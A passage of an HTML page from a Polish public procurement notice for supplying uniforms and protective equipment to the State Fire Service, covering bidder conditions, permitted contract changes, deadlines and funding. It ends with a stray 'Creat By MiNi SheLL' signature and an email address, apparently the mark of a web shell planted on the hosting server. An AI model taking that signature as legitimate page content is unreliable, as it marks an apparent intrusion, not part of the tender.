jeżeli wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie ) wykonał w ramach jednego kontraktu minimum jedną dostawę umundurowania albo środków ochrony indywidualnej albo przedmiotów ekwipunku osobistego dla jednostek Państwowej Straży Pożarnej lub innych służb mundurowych, o wartości co najmniej 100 000 zł brutto.<br/><br/>Za spełniającą warunek Zamawiający uzna zarówno dostawę (umowę) obejmującą jednorazową dostawę umundurowania/środków ochrony indywidualnej/przedmiotów ekwipunku osobistego, jak również dostawę (umowę) obejmującą sukcesywną dostawę umundurowania/środków ochrony indywidualnej/przedmiotów ekwipunku osobistego. W przypadku dostaw (umów) będących w trakcie realizacji, łączna wartość zrealizowanej/ych części dostawy (umowy) musi wynosić co najmniej 100 000,00 zł brutto. Potwierdzeniem spełniania warunku będą przedstawione referencje</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia wraz z ofertą przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie niniejszego zamówienia.<br/>	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie zamówienia .<br/>	Oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, składa każdy z Wykonawców.<br/>	Jeżeli oferta wykonawców wspólnie ubiegających się o zamówienie zostanie najwyżej oceniona to na wezwanie Zamawiającego są oni zobowiązani złożyć dokumenty i oświadczenia o których mowa w pkt. 10.7 przy czym składa je ten wykonawca, który wykazuje spełnienie warunku zgodnie z zasadami określonymi w pkt. 8 IDW. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Działając na podstawie przepisu art. 455 ust. 1 pkt 1 ustawy Pzp Zamawiający przewiduje możliwość zmiany Umowy w przypadku:<br/>1)	konieczność przedłużenia terminu wykonania przedmiotu Umowy z uwagi na:<br/>a)	istnienie realnego zagrożenia w terminowym realizowaniu płatności z powodu ograniczonych zasileń budżetowych otrzymywanych od jednostek nadrzędnych lub opóźnień w procesie zmiany limitów budżetowych właściwych dysponentów – o okres trwania tych okoliczności<br/>b)	wystąpienie siły wyższej, za którą uznaje się zdarzenia lub połączenie zdarzeń obiektywnie niezależnych od stron umowy, które zasadniczo i istotnie utrudniają wykonanie części lub całości zobowiązań wynikających z umowy, a których strony nie mogły wcześniej przewidzieć i którym nie mogły przeciwdziałać poprzez działanie z należytą starannością ogólnie przewidzianą dla cywilnoprawnych stosunków zobowiązaniowych - o okres opóźniający lub wstrzymujący realizację umowy z powodu wystąpienia siły wyższej; <br/>2)	wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację Umowy; <br/>3) zmianę rozwiązań technicznych lub technologicznych mających wpływ na realizację umowy, w szczególności poprzez pojawienie się nowych rozwiązań, ulepszających asortyment, w stosunku do złożonej oferty albo w związku z brakiem dostępności na rynku danego asortymentu lub wycofania go z produkcji;<br/>2.	Każda zmiana postanowień Umowy wymaga zachowania formy pisemnej pod rygorem nieważności <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-09-16 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-f2d57942-58e4-45d5-a6e0-b07b743266db</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-09-16 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamówienie będzie finansowane ze środków krajowych - z budżetu państwa w ramach Wojewódzkiego Programu Ochrony Ludności i Obrony Cywilnej na rok 2025.<br/>Zamawiający zastrzega sobie prawo do unieważnienia postępowania o udzielenie zamówienia publicznego w przypadku nie otrzymania środków finansowych na realizację zamówienia.

Creat By MiNi SheLL
Email: jattceo@gmail.com